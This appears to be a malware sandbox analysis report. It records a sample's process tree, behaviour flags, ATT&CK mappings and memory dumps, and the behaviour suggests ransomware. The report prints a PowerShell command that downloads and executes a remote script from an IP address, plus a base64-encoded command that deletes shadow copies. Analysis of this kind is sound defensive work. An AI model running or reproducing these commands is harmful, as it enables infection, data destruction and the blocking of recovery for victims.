C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0cc92ed976f20bbf302be1a39d209cfb');Invoke-JNLSXVWQ;Start-Sleep -s 10000"
2⤵
- Modifies system certificate store
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Sets desktop wallpaper using registry
- Modifies extensions of user files
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1844

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/1440-5-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/1440-21-0x0000000005860000-0x0000000005861000-memory.dmp

Filesize
4KB

Download
memory/1440-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/1440-14-0x0000000006220000-0x0000000006221000-memory.dmp

Filesize
4KB

Download
memory/1440-13-0x00000000056F0000-0x00000000056F1000-memory.dmp

Filesize
4KB

Download
memory/1440-8-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/1440-0-0x0000000000000000-mapping.dmp

Download
memory/1440-4-0x0000000001250000-0x0000000001251000-memory.dmp

Filesize
4KB

Download
memory/1440-3-0x0000000004700000-0x0000000004701000-memory.dmp

Filesize
4KB

Download
memory/1440-2-0x0000000000C30000-0x0000000000C31000-memory.dmp

Filesize
4KB

Download
memory/1440-1-0x0000000074630000-0x0000000074D1E000-memory.dmp

Filesize
6.9MB

Download
memory/1844-23-0x0000000000000000-mapping.dmp

Download
memory/1844-25-0x0000000074630000-0x0000000074D1E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads